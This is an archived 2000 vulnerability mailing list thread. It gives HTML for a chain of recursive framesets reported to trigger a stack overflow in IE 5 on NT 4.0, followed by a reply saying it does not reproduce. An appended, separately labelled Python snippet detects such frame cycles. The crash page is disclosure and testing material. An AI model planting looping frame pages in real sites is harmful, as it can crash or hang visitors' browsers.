Vulnerability Development mailing list archives

Re: Stack Overflow in IE 5 (NT 4.0)


From: Herakel Endrawes <herakel () UNIV HAIFA AC IL>
Date: Wed, 16 Aug 2000 09:56:00 +0200

IE 5 on NT 4 SP5 works fine. Does not open any blank buttons. A new URL
opens fine also.

-----Original Message-----
From: Sherrod, Andrew [mailto:andrew.sherrod () TFN COM]
Sent: Tuesday, August 15, 2000 6:00 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Stack Overflow in IE 5 (NT 4.0)


I am uncertain if this is exploitable, but it seems a possibility:

Create a web page as follows:

<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
</HEAD>
<FRAMESET rows=80,20>
<FRAME src="b.html">
<FRAME src="http://www.yahoo.com">
</FRAMESET>
</HTML>

Save as "a.html".

Repeat, changing b to c and saving page as "b.html".

Continue through "q.html", which refers not to "r.html", but back to
"a.html":

(Text of q.html):

<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
</HEAD>
<FRAMESET cols=80,20>
<FRAME src="a.html">
<FRAME src="http://www.yahoo.com">
</FRAMESET>
</HTML>

(Some cursory tests suggest 17 frames as the minimum to produce the
overflow.)

This page will have no effect on Netscape, which loads frames up through
q.html, leaving an empty frame where a.html should be.

IE 5 does the same, but also creates two blank buttons on the task bar and
sometimes briefly creates a floating white square in the upper left corner
of the screen. It does not crash immediately, but when a new URL is entered
a stack overflow occurs.

I haven't had time to fully examine this, or see if there is a means to
exploit the overflow.

AGS
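A static check for the looping frame chain described in the post above, added here as an example that is not part of the original message or the thread: it builds 17 constructed pages a.html through q.html in the shape the post describes, parses their <FRAME src> references, and reports the cycle that q.html closes by framing a.html again, while a chain that simply ends in a missing page is reported as clean. Function names and the page contents are my own assumptions, modelled on the post.

```python
from html.parser import HTMLParser
from string import ascii_lowercase
from urllib.parse import urlparse

class FrameCollector(HTMLParser):
    """Collect src attributes of <frame>/<iframe> tags."""
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag in ("frame", "iframe"):
            self.srcs += [v for k, v in attrs if k == "src" and v]

def frame_page(child):
    # Constructed page in the shape of the post's a.html (added example, not the post's file).
    return ('<HTML><HEAD><TITLE>INFINITE FRAMES</TITLE></HEAD>'
            '<FRAMESET rows="80,20"><FRAME src="%s">'
            '<FRAME src="http://www.yahoo.com"></FRAMESET></HTML>' % child)

def build_site(loop_back):
    """Constructed a.html .. q.html; q.html frames a.html when loop_back is set."""
    names = [c + ".html" for c in ascii_lowercase[:17]]  # a..q, 17 pages as in the post
    last = "a.html" if loop_back else "r.html"  # r.html does not exist: chain just ends
    return {n: frame_page(names[i + 1] if i + 1 < len(names) else last)
            for i, n in enumerate(names)}

def local_frame_refs(site):
    """Map each page to the same-site pages it frames (external URLs are ignored)."""
    graph = {}
    for name, html in site.items():
        p = FrameCollector()
        p.feed(html)
        graph[name] = [s for s in p.srcs if not urlparse(s).netloc]
    return graph

def find_frame_cycle(site, start="a.html"):
    """DFS from `start`; return the first frame cycle as a list of pages, else None."""
    graph, stack = local_frame_refs(site), []
    def visit(node):
        if node in stack:            # back edge: the frame chain loops on itself
            return stack[stack.index(node):] + [node]
        if node not in graph:        # missing or external page ends the chain
            return None
        stack.append(node)
        for child in graph[node]:
            if (found := visit(child)):
                return found
        stack.pop()
        return None
    return visit(start)
```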

